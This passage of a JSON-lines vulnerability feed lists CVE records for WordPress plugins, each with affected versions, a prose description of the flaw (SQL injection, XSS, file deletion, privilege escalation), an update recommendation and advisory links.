{"CVE_ID":"CVE-2025-4855","slug":"supportboard","versionImpact":"3.8.0","versionEndExcluding":"3.8.1","description":"The Support Board plugin for WordPress is vulnerable to unauthorized access\/modification\/deletion of data due to use of hardcoded default secrets in the sb_encryption() function in all versions up to, and including, 3.8.0. This makes it possible for unauthenticated attackers to bypass authorization and execute arbitrary AJAX actions defined in the sb_ajax_execute() function. An attacker can use this vulnerability to exploit CVE-2025-4828 and various other functions unauthenticated.","recommendation":"Update to version 3.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/support-board-help-desk-and-chat\\\/20359943\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/support-board-help-desk-and-chat\\\/20359943\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/afd48bc8-d490-4a3e-97fc-70cf008cbf66?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/afd48bc8-d490-4a3e-97fc-70cf008cbf66?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4828","slug":"supportboard","versionImpact":"3.8.0","versionEndExcluding":"3.8.1","description":"The Support Board plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the sb_file_delete function in all versions up to, and including, 3.8.0. This makes it possible for attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). An attacker can leverage the CVE-2025-4855 vulnerability to exploit this vulnerability unauthenticated.","recommendation":"Update to version 3.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/support-board-help-desk-and-chat\\\/20359943\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/support-board-help-desk-and-chat\\\/20359943\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33989611-8640-4c33-a34e-14f10cd7286d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33989611-8640-4c33-a34e-14f10cd7286d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2032","slug":"custom-404-pro","versionEndExcluding":"3.8.1","description":"The Custom 404 Pro WordPress plugin before 3.8.1 does not properly sanitize database inputs, leading to multiple SQL Injection vulnerabilities.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/17acde5d-44ea-4e77-8670-260d22e28ffe\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/17acde5d-44ea-4e77-8670-260d22e28ffe\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6487","slug":"intelly-related-posts","versionImpact":"3.7.0","versionEndExcluding":"3.8.0","description":"The Inline Related Posts WordPress plugin before 3.8.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eeec9608-a7b2-4926-bac2-4c81a65dd473\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eeec9608-a7b2-4926-bac2-4c81a65dd473\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0144","slug":"mage-eventpress","versionEndExcluding":"3.8.0","description":"The Event Manager and Tickets Selling Plugin for WooCommerce WordPress plugin before 3.8.0 does not validate and escape some of its post meta before outputting them back in a page\/post, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d7b3917a-d11f-4216-9d2c-30771d83a7b4\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d7b3917a-d11f-4216-9d2c-30771d83a7b4\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0705","slug":"payment-gateway-stripe-and-woocommerce-integration","versionImpact":"3.7.9","versionEndExcluding":"3.8.0","description":"The Stripe Payment Plugin for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 3.7.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2652a7fc-b610-40f1-8b76-2129f59390ec?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2652a7fc-b610-40f1-8b76-2129f59390ec?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2954934%40payment-gateway-stripe-and-woocommerce-integration&new=2954934%40payment-gateway-stripe-and-woocommerce-integration&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2954934%40payment-gateway-stripe-and-woocommerce-integration&new=2954934%40payment-gateway-stripe-and-woocommerce-integration&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9610","slug":"language-switcher","versionImpact":"3.7.13","versionEndExcluding":"3.8.0","description":"The Language Switcher plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.7.13. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f117fffb-2bbb-4e95-b589-909972db1e5e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f117fffb-2bbb-4e95-b589-909972db1e5e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/language-switcher\\\/tags\\\/3.7.13\\\/includes\\\/class-language-switcher-settings.php#L464\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/language-switcher\\\/tags\\\/3.7.13\\\/includes\\\/class-language-switcher-settings.php#L464\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165172\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165172\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13553","slug":"sms-alert","versionImpact":"3.7.9","versionEndExcluding":"3.8.0","description":"The SMS Alert Order Notifications \u2013 WooCommerce plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.7.9. This is due to the plugin using the Host header to determine if the plugin is in a playground environment. This makes it possible for unauthenticated attackers to spoof the Host header to make the OTP code \"1234\" and authenticate as any user, including administrators.","recommendation":"Update to version 3.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3227241%40sms-alert&new=3227241%40sms-alert&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3227241%40sms-alert&new=3227241%40sms-alert&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3248017%40sms-alert&new=3248017%40sms-alert&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3248017%40sms-alert&new=3248017%40sms-alert&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e444a30-11c5-4219-b4fe-635084cbac3a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e444a30-11c5-4219-b4fe-635084cbac3a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-50879","slug":"full-site-editing","versionEndExcluding":"3.79150","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Automattic WordPress.Com Editing Toolkit allows Stored XSS.This issue affects WordPress.Com Editing Toolkit: from n\/a through 3.78784.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/full-site-editing\\\/wordpress-wordpress-com-editing-toolkit-plugin-3-78784-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/full-site-editing\\\/wordpress-wordpress-com-editing-toolkit-plugin-3-78784-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-34561","slug":"real3d-flipbook-lite","versionImpact":"3.71","versionEndExcluding":"3.72","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Creative interactive media 3D FlipBook, PDF Viewer, PDF Embedder \u2013 Real 3D FlipBook WordPress Plugin allows Stored XSS.This issue affects 3D FlipBook, PDF Viewer, PDF Embedder \u2013 Real 3D FlipBook WordPress Plugin: from n\/a through 3.71.\n\n","recommendation":"Update to version 3.72, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/real3d-flipbook-lite\\\/wordpress-real3d-flipbook-pdf-viewer-lite-plugin-3-71-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/real3d-flipbook-lite\\\/wordpress-real3d-flipbook-pdf-viewer-lite-plugin-3-71-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0321","slug":"elementskit","versionImpact":"3.7.8","versionEndExcluding":"3.7.9","description":"The ElementsKit Pro plugin for WordPress is vulnerable to DOM-Based Stored Cross-Site Scripting via the \u2018url\u2019 parameter in all versions up to, and including, 3.7.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.7.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpmet.com\\\/plugin\\\/elementskit\\\/\",\"name\":\"https:\\\/\\\/wpmet.com\\\/plugin\\\/elementskit\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpmet.com\\\/plugin\\\/elementskit\\\/roadmaps\\\/\",\"name\":\"https:\\\/\\\/wpmet.com\\\/plugin\\\/elementskit\\\/roadmaps\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/204cfe20-9df1-4f6c-a38c-a21b43dde385?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/204cfe20-9df1-4f6c-a38c-a21b43dde385?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5343","slug":"ays-popup-box","versionImpact":"3.7.8","versionEndExcluding":"3.7.9","description":"The Popup box WordPress plugin before 3.7.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed.","recommendation":"Update to version 3.7.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/74613b38-48f2-43d5-bae5-25c89ba7db6e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/74613b38-48f2-43d5-bae5-25c89ba7db6e\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4726","slug":"ultimate-dashboard","versionImpact":"3.7.7","versionEndExcluding":"3.7.8","description":"The Ultimate Dashboard plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 3.7.7. due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 3.7.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79cce1fc-a27f-4842-b1a2-2c53857add4c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79cce1fc-a27f-4842-b1a2-2c53857add4c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2991103%40ultimate-dashboard%2Ftrunk&old=2958955%40ultimate-dashboard%2Ftrunk&sfp_email=&sfph_mail=#file5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2991103%40ultimate-dashboard%2Ftrunk&old=2958955%40ultimate-dashboard%2Ftrunk&sfp_email=&sfph_mail=#file5\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11725","slug":"sms-alert","versionImpact":"3.7.6","versionEndExcluding":"3.7.7","description":"The SMS Alert Order Notifications \u2013 WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the updateWcWarrantySettings() function in all versions up to, and including, 3.7.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site. Please note this requires the woocommerce-warranty plugin to be installed in order to be exploited.","recommendation":"Update to version 3.7.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sms-alert\\\/trunk\\\/helper\\\/return-warranty.php#L74\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sms-alert\\\/trunk\\\/helper\\\/return-warranty.php#L74\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198056\\\/sms-alert\\\/trunk\\\/helper\\\/return-warranty.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198056\\\/sms-alert\\\/trunk\\\/helper\\\/return-warranty.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3197777%40sms-alert&new=3197777%40sms-alert&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3197777%40sms-alert&new=3197777%40sms-alert&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3199795%40sms-alert&new=3199795%40sms-alert&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3199795%40sms-alert&new=3199795%40sms-alert&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207391%40sms-alert&new=3207391%40sms-alert&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207391%40sms-alert&new=3207391%40sms-alert&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33517dba-78ac-4391-a55e-d1f13801b212?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33517dba-78ac-4391-a55e-d1f13801b212?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2812","slug":"ultimate-dashboard","versionEndExcluding":"3.7.6","description":"The Ultimate Dashboard WordPress plugin before 3.7.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7de4c313-359e-4450-85f5-d29f3c2f046a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7de4c313-359e-4450-85f5-d29f3c2f046a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5857","slug":"funnelforms-free","versionImpact":"3.7.3.2","versionEndExcluding":"3.7.4.1","description":"The Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor \u2013 Funnelforms Free plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the af2_handel_file_remove AJAX action in all versions up to, and including, 3.7.3.2. This makes it possible for unauthenticated attackers to delete arbitrary media files.","recommendation":"Update to version 3.7.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cd0e015-abf2-4905-8b42-46b685be2c74?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cd0e015-abf2-4905-8b42-46b685be2c74?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3141470\\\/funnelforms-free\\\/trunk\\\/frontend\\\/frontend.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3141470\\\/funnelforms-free\\\/trunk\\\/frontend\\\/frontend.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7447","slug":"funnelforms-free","versionImpact":"3.7.3.2","versionEndExcluding":"3.7.4.1","description":"The Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor \u2013 Funnelforms Free plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'fnsf_af2_handel_file_upload' function in all versions up to, and including, 3.7.3.2. This makes it possible for unauthenticated attackers to upload arbitrary media to the site, even if no forms exist.","recommendation":"Update to version 3.7.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9871f683-136e-45b5-90fb-a373a771014b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9871f683-136e-45b5-90fb-a373a771014b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnelforms-free\\\/trunk\\\/frontend\\\/frontend.php#L2577\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnelforms-free\\\/trunk\\\/frontend\\\/frontend.php#L2577\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3141470\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3141470\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6312","slug":"funnelforms-free","versionImpact":"3.7.3.2","versionEndExcluding":"3.7.4.1","description":"The Funnelforms Free plugin for WordPress is vulnerable to arbitrary file deletion in all versions up to, and including, 3.7.3.2 via the 'af2DeleteFontFile' function. This is due to the plugin not properly validating a file or its path prior to deleting it. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible.","recommendation":"Update to version 3.7.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e815531-f966-44a1-a037-8077a40c83b0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e815531-f966-44a1-a037-8077a40c83b0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnelforms-free\\\/tags\\\/3.7.3.2\\\/admin\\\/menu_ajax_functions\\\/formularbuilder_fonts.php#L59\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnelforms-free\\\/tags\\\/3.7.3.2\\\/admin\\\/menu_ajax_functions\\\/formularbuilder_fonts.php#L59\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnelforms-free\\\/tags\\\/3.7.4.1\\\/admin\\\/menu_ajax_functions\\\/formularbuilder_fonts.php?rev=3141470#L17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnelforms-free\\\/tags\\\/3.7.4.1\\\/admin\\\/menu_ajax_functions\\\/formularbuilder_fonts.php?rev=3141470#L17\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6311","slug":"funnelforms-free","versionImpact":"3.7.3.2","versionEndExcluding":"3.7.4.1","description":"The Funnelforms Free plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'af2_add_font' function in all versions up to, and including, 3.7.3.2. This makes it possible for authenticated attackers, with administrator-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 3.7.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbd42fc4-ab4a-4053-b765-18272eacd2bc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbd42fc4-ab4a-4053-b765-18272eacd2bc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnelforms-free\\\/tags\\\/3.7.3.2\\\/admin\\\/menu_ajax_functions\\\/formularbuilder_fonts.php#L47\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnelforms-free\\\/tags\\\/3.7.3.2\\\/admin\\\/menu_ajax_functions\\\/formularbuilder_fonts.php#L47\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnelforms-free\\\/tags\\\/3.7.4.1\\\/admin\\\/menu_ajax_functions\\\/formularbuilder_fonts.php?rev=3141470#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnelforms-free\\\/tags\\\/3.7.4.1\\\/admin\\\/menu_ajax_functions\\\/formularbuilder_fonts.php?rev=3141470#L50\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2262","slug":"gs-logo-slider","versionImpact":"3.7.3","versionEndExcluding":"3.7.4","description":"The The Logo Slider \u2013 Logo Showcase, Logo Carousel, Logo Gallery and Client Logo Presentation plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.7.3. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 3.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-logo-slider\\\/trunk\\\/includes\\\/shortcode-builder\\\/builder.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-logo-slider\\\/trunk\\\/includes\\\/shortcode-builder\\\/builder.php#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-logo-slider\\\/trunk\\\/includes\\\/shortcode-builder\\\/builder.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-logo-slider\\\/trunk\\\/includes\\\/shortcode-builder\\\/builder.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-logo-slider\\\/trunk\\\/includes\\\/shortcode-builder\\\/builder.php#L65\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-logo-slider\\\/trunk\\\/includes\\\/shortcode-builder\\\/builder.php#L65\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3256441\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3256441\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c7cc2d2-8de4-453b-b4dc-48f75b151078?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c7cc2d2-8de4-453b-b4dc-48f75b151078?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5864","slug":"easy-affiliate-links","versionImpact":"3.7.3","versionEndExcluding":"3.7.4","description":"The Easy Affiliate Links plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the eafl_reset_settings AJAX action in all versions up to, and including, 3.7.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to reset the plugin's settings.","recommendation":"Update to version 3.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e8a4c656-8df8-44ce-884f-dd502d17f594?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e8a4c656-8df8-44ce-884f-dd502d17f594?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3106718\\\/easy-affiliate-links\\\/trunk\\\/includes\\\/admin\\\/class-eafl-tools-manager.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3106718\\\/easy-affiliate-links\\\/trunk\\\/includes\\\/admin\\\/class-eafl-tools-manager.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7082","slug":"wp-all-import","versionEndExcluding":"3.7.3","description":"The Import any XML or CSV File to WordPress plugin before 3.7.3 accepts all zip files and automatically extracts the zip file into a publicly accessible directory without sufficiently validating the extracted file type. This may allow high privilege users such as administrator to upload an executable file type leading to remote code execution.","recommendation":"Update to version 3.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7f947305-7a72-4c59-9ae8-193f437fd04e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7f947305-7a72-4c59-9ae8-193f437fd04e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10125","slug":"wp-ultimate-csv-importer","versionImpact":"3.7.2","versionEndExcluding":"3.7.3","description":"A vulnerability classified as problematic has been found in WP Ultimate CSV Importer Plugin 3.7.2 on WordPress. This affects an unknown part. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. Upgrading to version 3.7.3 is able to address this issue. The identifier of the patch is 13c30af721d3f989caac72dd0f56cf0dc40fad7e. It is recommended to upgrade the affected component. The identifier VDB-241317 was assigned to this vulnerability.","recommendation":"Update to version 3.7.3, or a newer patched 